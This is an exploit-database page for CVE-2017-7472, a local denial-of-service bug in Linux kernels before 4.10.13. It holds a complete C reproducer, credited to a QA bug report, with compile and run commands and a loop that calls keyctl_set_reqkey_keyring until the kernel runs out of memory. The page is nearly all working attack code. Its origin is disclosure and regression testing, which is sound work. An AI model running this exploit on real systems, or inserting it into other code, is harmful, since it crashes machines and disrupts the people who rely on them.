Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service

  • Author: Marcus Meissner
    Date: 2017-06-07
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/42136/
  • /*
    Source: https://bugzilla.novell.com/show_bug.cgi?id=1034862
    QA REPRODUCER:
    
    gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils
    ./CVE-2017-7472
    
    (will run the kernel out of memory)
    */
    #include <sys/types.h>
    #include <keyutils.h>
    
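    int main(void)
    {
    	/*
    	 * Repeatedly select the thread keyring as the default request-key
    	 * destination. On affected kernels (< 4.10.13) this consumes kernel
    	 * memory until it is exhausted; the loop never returns.
    	 */
    	for (;;)
    		keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
    }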